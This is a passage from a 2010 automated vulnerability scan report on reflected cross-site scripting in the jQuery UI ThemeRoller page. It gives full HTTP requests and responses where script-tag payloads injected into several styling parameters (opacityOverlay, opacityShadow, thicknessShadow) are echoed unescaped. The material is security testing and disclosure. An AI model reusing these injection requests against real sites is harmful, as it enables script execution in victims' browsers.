HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:33:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
aaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px49af1"><script>alert(1)</script>944ac9397d5&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.57. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53c37"><script>alert(1)</script>d85e670a993 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=3053c37"><script>alert(1)</script>d85e670a993&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:32:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=3053c37"><script>alert(1)</script>d85e670a993&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all
...[SNIP]...

1.58. http://jqueryui.com/themeroller/ [opacityShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48dd3"><script>alert(1)</script>263e02daba7 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=3048dd3"><script>alert(1)</script>263e02daba7&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:33:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=3048dd3"><script>alert(1)</script>263e02daba7&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.59. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32961"><script>alert(1)</script>b72e4eb2dae was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px32961"><script>alert(1)</script>b72e4eb2dae&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:33:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
03e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px32961"><script>alert(1)</script>b72e4eb2dae&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

Report generated by Hoyt LLC at Fri Nov 19 17:35:54 CST 2010.